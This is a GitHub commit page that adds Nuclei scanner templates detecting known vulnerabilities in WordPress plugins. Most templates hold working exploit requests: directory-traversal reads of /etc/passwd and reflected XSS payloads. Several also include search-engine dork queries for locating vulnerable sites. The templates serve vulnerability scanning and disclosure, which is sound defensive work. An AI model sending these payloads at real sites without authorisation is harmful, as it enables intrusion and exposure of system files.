-
Notifications
You must be signed in to change notification settings - Fork 273
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
62bad0f
commit dc2bed7
Showing
99 changed files
with
5,526 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241214 | ||
20241215 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: ider-login-77ccffccfac1bb6eac46823913cc705c | ||
|
||
info: | ||
name: > | ||
IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/ider-login/" | ||
google-query: inurl:"/wp-content/plugins/ider-login/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,ider-login,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "ider-login" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 2.1') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: CVE-2011-1669 | ||
|
||
info: | ||
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) | ||
author: daffainfo | ||
severity: high | ||
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. | ||
reference: | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 | ||
- https://www.exploit-db.com/exploits/17119 | ||
tags: cve,cve2011,wordpress,wp-plugin,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-5179 | ||
|
||
info: | ||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-4768 | ||
|
||
info: | ||
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 | ||
tags: cve,cve2012,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2013-4625 | ||
|
||
info: | ||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
id: CVE-2015-5471 | ||
info: | ||
name: Swim Team <= v1.44.10777 - Local File Inclusion | ||
author: 0x_Akoko | ||
severity: medium | ||
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. | ||
reference: | ||
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 | ||
- http://www.vapid.dhs.org/advisory.php?v=134 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471 | ||
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html | ||
remediation: Upgrade to Swim Team version 1.45 or newer. | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 5.3 | ||
cve-id: CVE-2015-5471 | ||
cwe-id: CWE-22 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/wp-swimteam" | ||
tags: cve,cve2015,wordpress,wp-plugin,lfi | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by cs on 2022/02/25 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2016-1000129 | ||
info: | ||
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000129 | ||
cwe-id: CWE-79 | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2016-1000133 | ||
|
||
info: | ||
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000133 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2016-1000140 | ||
|
||
info: | ||
name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000140 | ||
cwe-id: CWE-79 | ||
description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2016-1000141 | ||
info: | ||
name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. | ||
remediation: Upgrade to version 2.0 or higher. | ||
reference: | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=358 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000141 | ||
cwe-id: CWE-79 | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/03/24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
id: CVE-2016-10956 | ||
|
||
info: | ||
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) | ||
author: daffainfo,0x240x23elu | ||
severity: high | ||
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. | ||
reference: | ||
- https://cxsecurity.com/issue/WLB-2016080220 | ||
- https://wpvulndb.com/vulnerabilities/8609 | ||
- https://wordpress.org/plugins/mail-masta/#developers | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2016-10956 | ||
cwe-id: CWE-20 | ||
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" | ||
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
part: body | ||
- type: status | ||
status: | ||
- 200 | ||
- 500 |
Oops, something went wrong.